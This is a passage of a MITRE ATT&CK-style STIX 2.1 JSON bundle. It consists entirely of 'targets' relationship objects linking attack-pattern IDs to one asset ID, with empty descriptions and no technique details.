"relationship--14c1b87e-c26f-4044-a6bf-3d8d5618ccdc", "created": "2024-07-01T10:37:15.830229", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830231", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6637e54-d0c7-4293-9bb0-19bb7a031772", "created": "2024-07-01T10:37:15.830239", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830241", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c558c374-073c-41ed-a2b0-0a93ccef05c4", "created": "2024-07-01T10:37:15.830249", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830251", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a958dbeb-011a-44f3-8868-8dc52a7ef50f", "created": "2024-07-01T10:37:15.830259", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830261", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d5fb4e0-788f-433c-bf0f-75145d11f2eb", "created": "2024-07-01T10:37:15.830269", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830271", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f41c887-78d7-42ca-8220-2dd50a6f05a3", "created": "2024-07-01T10:37:15.830279", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830281", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8787d4c0-22d3-4d3c-bc0d-d10647a6d26b", "created": "2024-07-01T10:37:15.830289", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830291", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f37c08e7-a754-4314-9a65-4db43a4c5c09", "created": "2024-07-01T10:37:15.830299", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830301", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84b73a30-4e73-42a1-bdd3-89c0e858380a", "created": "2024-07-01T10:37:15.830309", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830311", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b4dc389-fb99-4fd7-b1f5-233ce06a7279", "created": "2024-07-01T10:37:15.830319", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830321", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff705340-558b-4bd4-9c2d-e663519b0ed4", "created": "2024-07-01T10:37:15.830329", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830331", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b555877f-8db9-4111-a85a-adebc98bbb94", "created": "2024-07-01T10:37:15.830339", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830341", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b199961-bd89-4ffa-8245-63e3463514f7", "created": "2024-07-01T10:37:15.830348", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830351", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ae0231a-7e9b-490b-9646-a009b576ca34", "created": "2024-07-01T10:37:15.830358", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830360", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dab62ceb-5d89-4d8d-8903-542b089848f2", "created": "2024-07-01T10:37:15.830368", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830370", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c9a90c2-af77-4eac-840e-996d629b69b0", "created": "2024-07-01T10:37:15.830379", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830381", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d25cebb5-f6d7-4d0c-a139-2f391900c2e2", "created": "2024-07-01T10:37:15.830389", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830391", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d17e79ff-8d9e-430d-8729-6a4e057c12d2", "created": "2024-07-01T10:37:15.830399", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830401", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ecb270e8-a842-4bb3-bb44-5a0c8e85dea6", "created": "2024-07-01T10:37:15.830408", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830411", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0af8b22-3107-4e6e-9e1b-c42a9d16af3b", "created": "2024-07-01T10:37:15.830418", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830421", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d37f4b7-6b19-4386-90ae-2908541fbb88", "created": "2024-07-01T10:37:15.830429", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830431", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--61d9fba8-c90a-40d4-8d46-071ed0d1744e", "created": "2024-07-01T10:37:15.830439", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830441", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--709b75f1-7a76-45b4-b28d-9ddd7aabc619", "created": "2024-07-01T10:37:15.830449", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830451", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25d9cfbd-3603-47cc-94a6-66fc353c35a2", "created": "2024-07-01T10:37:15.830459", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830461", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e70af2bc-7997-424b-a8e8-a37bbbb29b2c", "created": "2024-07-01T10:37:15.830469", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830471", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b68b2258-954f-4294-9a8f-56b4ee7a7eb0", "created": "2024-07-01T10:37:15.830479", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830481", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--474f103e-eb19-4f39-8893-0b23683ceabc", "created": "2024-07-01T10:37:15.830489", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830491", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24a12073-e946-454e-b086-ccf033256d20", "created": "2024-07-01T10:37:15.830498", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830501", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--11748e80-e403-48af-a3f8-02edb3cf7515", "created": "2024-07-01T10:37:15.830508", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830510", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8938e45f-3310-4cfc-9e0d-7a6bc60ad6da", "created": "2024-07-01T10:37:15.830518", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830520", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a9e6217-ea5c-48a3-9018-80ccf7afaa37", "created": "2024-07-01T10:37:15.830528", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830530", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ece35d7b-d29e-4209-b3a8-586149320f14", "created": "2024-07-01T10:37:15.830538", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830540", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f2fc45a-aad5-4521-b1e2-4dec16a7ad3d", "created": "2024-07-01T10:37:15.830548", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830551", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66718eee-8d00-44d3-b4a1-3dfbfd84d9a0", "created": "2024-07-01T10:37:15.830558", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830561", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb5e6931-266e-4479-9267-0955ec7c43ee", "created": "2024-07-01T10:37:15.830568", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830571", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7cb1463-2ac8-4989-84b6-d4622a14670f", "created": "2024-07-01T10:37:15.830578", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830580", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f66b22d4-71ac-4883-8309-0ae753569e46", "created": "2024-07-01T10:37:15.830588", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830590", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fcd580ae-7552-47cc-a87c-16168acc2579", "created": "2024-07-01T10:37:15.830598", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830600", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b29ba6d5-3de6-49a3-a8dc-5cf5b44a0609", "created": "2024-07-01T10:37:15.830608", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830610", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1dc0a60-8743-4099-839e-5e7990a2a453", "created": "2024-07-01T10:37:15.830618", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830620", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7113f073-69b0-4351-ac35-5e7df17d80d7", "created": "2024-07-01T10:37:15.830628", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830630", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a0b156f4-fc32-41d4-bedc-ab3b4c2e3cba", "created": "2024-07-01T10:37:15.830638", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": 